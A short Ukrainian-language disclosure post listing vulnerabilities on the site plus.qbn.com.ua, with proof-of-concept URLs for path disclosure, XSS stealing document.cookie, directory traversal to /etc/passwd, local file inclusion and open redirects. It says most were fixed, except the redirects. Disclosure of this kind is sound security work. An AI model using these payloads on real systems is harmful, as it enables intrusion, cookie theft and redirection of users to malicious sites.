Уразливості на plus.qbn.com.ua
15:11 26.05.201023.11.2009
У березні, 13.03.2009, я знайшов Full path disclosure, Cross-Site Scripting, Directory Traversal, Local File Inclusion та Redirector уразливості на сайті http://plus.qbn.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
26.05.2010
Full path disclosure:
http://plus.qbn.com.ua/www/delivery/fc.php?MAX_type=1
XSS:
http://plus.qbn.com.ua/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E
Directory Traversal:
http://plus.qbn.com.ua/www/delivery/fc.php?MAX_type=../../../../../../../etc/passwd%00
Local File Inclusion:
http://plus.qbn.com.ua/www/delivery/fc.php?MAX_type=../file.php
Redirector:
http://plus.qbn.com.ua/www/delivery/ck.php?dest=http://websecurity.com.ua
http://plus.qbn.com.ua/adclick.php?maxdest=http://websecurity.com.ua
http://plus.qbn.com.ua/adclick.php?dest=http://websecurity.com.ua
Дані уразливості вже виправлені (за рахунок оновлення движка). Окрім Redirector уразливостей, також відомих як URL Redirector Abuse (в WASC TC v2).